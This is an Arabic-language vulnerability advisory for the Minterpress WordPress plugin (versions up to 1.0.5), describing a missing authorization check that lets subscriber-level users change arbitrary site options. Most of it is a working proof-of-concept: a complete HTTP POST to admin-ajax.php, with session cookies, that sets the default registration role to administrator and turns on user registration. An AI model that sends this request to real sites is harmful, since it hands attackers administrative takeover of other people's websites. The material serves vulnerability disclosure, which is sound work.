
Minterpress <= 1.0.5 - نقص التفويض إلى تحديث خيارات عشوائي للمستخدمين الموثوقين (مشترك فأكثر)
Minterpress <= 1.0.5 - غياب التصريح للمستخدمين المصادقين (مشترك فما فوق) لتحديث خيارات عشوائية
إضافة Minterpress لووردبريس معرضة لتعديل غير مصرح به للبيانات مما قد يؤدي إلى تصعيد الصلاحيات بسبب عدم وجود فحص للقدرات على إحدى الدوال في جميع الإصدارات حتى 1.0.5. وهذا يجعل من الممكن للمهاجمين المصادقين، بمستوى وصول مشترك فما فوق، تحديث خيارات عشوائية في موقع ووردبريس. يمكن استغلال ذلك لتحديث الدور الافتراضي للتسجيل إلى مسؤول وتمكين تسجيل المستخدمين ليتمكن المهاجمون من الحصول على وصول إداري إلى موقع ضعيف.
قم بتغيير الكوكيز إلى كوكيز المستخدم المسجل الدخول.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; th_shop_mania_thms_time=1735227350366; tk_qs=
action=update_options&options={"default_role":"administrator","users_can_register":"1"}